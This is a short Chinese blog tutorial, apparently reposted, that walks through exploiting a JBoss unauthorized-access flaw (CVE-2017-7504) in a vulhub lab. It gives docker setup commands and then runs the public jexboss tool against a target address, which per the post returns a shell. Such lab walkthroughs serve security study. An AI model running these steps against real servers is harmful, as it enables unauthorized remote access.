首页 > 其他 > 详细

JBOSS未授权访问漏洞利用

时间:2021-01-22 16:56:08      阅读:45      评论:0      收藏:0      [点我收藏+]

1. 环境搭建

https://www.cnblogs.com/chengNo1/p/14297387.html

搭建好vulhub平台后

进入对应漏洞目录

cd vulhub/jboss/CVE-2017-7504/

开启环境

docker-compose up -d

技术分享图片

2. 访问 http://172.16.12.15:8080/ 进入后台。点击JMX Console

技术分享图片

3. 漏洞利用工具

1、下载地址:https://github.com/joaomatosf/jexboss

2、cd jexboss

3、python3 jexboss.py //会弹出该工具使用方法

4、python3 jexboss.py -u 192.168.77.136:8080

技术分享图片

5、输入yes会反弹一个shell 回来
技术分享图片

JBOSS未授权访问漏洞利用

原文:https://www.cnblogs.com/chengNo1/p/14313877.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!